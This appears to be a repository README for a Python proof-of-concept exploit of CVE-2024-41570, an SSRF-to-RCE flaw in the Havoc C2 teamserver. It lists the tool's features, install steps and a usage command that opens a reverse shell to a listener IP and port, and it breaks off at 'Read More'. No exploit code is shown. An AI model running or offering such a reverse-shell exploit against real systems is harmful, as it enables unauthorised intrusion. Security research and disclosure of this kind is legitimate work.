Exploit for Server-Side Request Forgery in Havocframework Havoc

CVE-2024-41570 | Havoc C2 SSRF with RCE | Automated Reverse Shell Exploit via WebSocket This project provides a Python-based proof-of-concept (PoC) script to exploit a vulnerable WebSocket-based service. The script automates agent registration, WebSocket payload delivery, and remote command execution to establish a reverse shell. Features Registers an agent to the target service. Opens a WebSocket and sends handshake and authentication payloads. Executes commands remotely via a reverse shell. Provides a guided workflow with clear instructions. Prerequisites Python 3.x installed on your machine. Install required dependencies by running: bash pip install -r requirements.txt Installation Clone this repository: bash git clone https://github.com/<your-repo-name>.git Navigate to the project directory: bash cd CVE-2024-41570 Install dependencies: bash pip install -r requirements.txt Usage Run the script with the required arguments: bash python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port> Arguments -t: Target URL of the WebSocket server. -i: IP address of the Team Server form Havoc. -p: Port for the Team Server from Havoc. -U: Username for WebSocket authentication. -P: Password for WebSocket authentication. -l: Listener IP for the reverse shell (your machine). -L: Listener port for the reverse shell (your machine). Example Command bash python3 exploit.py -t…Read More